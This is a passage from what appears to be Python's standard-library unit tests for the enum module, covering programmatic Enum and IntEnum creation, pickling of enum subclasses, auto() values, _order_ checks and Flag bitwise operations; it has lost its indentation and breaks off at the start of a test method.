(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class AlwaysEqual:
def __eq__(self, other):
return True
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(AlwaysEqual(), OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, AlwaysEqual())
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Color(Flag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
